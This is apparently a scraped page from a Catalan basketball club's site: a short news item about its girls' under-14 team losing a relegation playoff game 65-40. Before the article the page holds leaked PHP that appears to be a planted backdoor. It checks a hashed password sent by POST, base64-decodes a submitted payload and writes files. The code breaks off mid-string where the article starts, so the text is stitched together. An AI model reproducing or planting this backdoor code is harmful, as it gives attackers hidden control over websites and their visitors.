function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil femení A no està fi de cara a cistella i perd el primer assalt de la permanència contra el Basket Almeda (65-40) - Tgn Bàsquet Club -

L’infantil femení A no està fi de cara a cistella i perd el primer assalt de la permanència contra el Basket Almeda (65-40)

Updated: maig 28, 2019

L’infantil femení A va perdre el primer partit de l’eliminatòria de permanència a la lliga Preferent (la màxima de Catalunya) contra el Basket Almeda. El conjunt lila no va tenir el dia en atac i això el va penalitzar molt, tot i fer una bona defensa. Les errades en atacs estàtics però també en contraatacs van provocar que el conjunt tarragoní només anotés 10 punts en els primers vint minuts (29-10). El TGN Bàsquet no va trobar el seu millor joc fins al final del tercer quart però aleshores el desavantatge ja era molt gran.

Ara, el conjunt lila necessita guanyar el pròxim partit al Sagrat Cor (dissabte, 16.30 h) per forçar el tercer matx de l’eliminatòria i intentar mantenir-se a la categoria.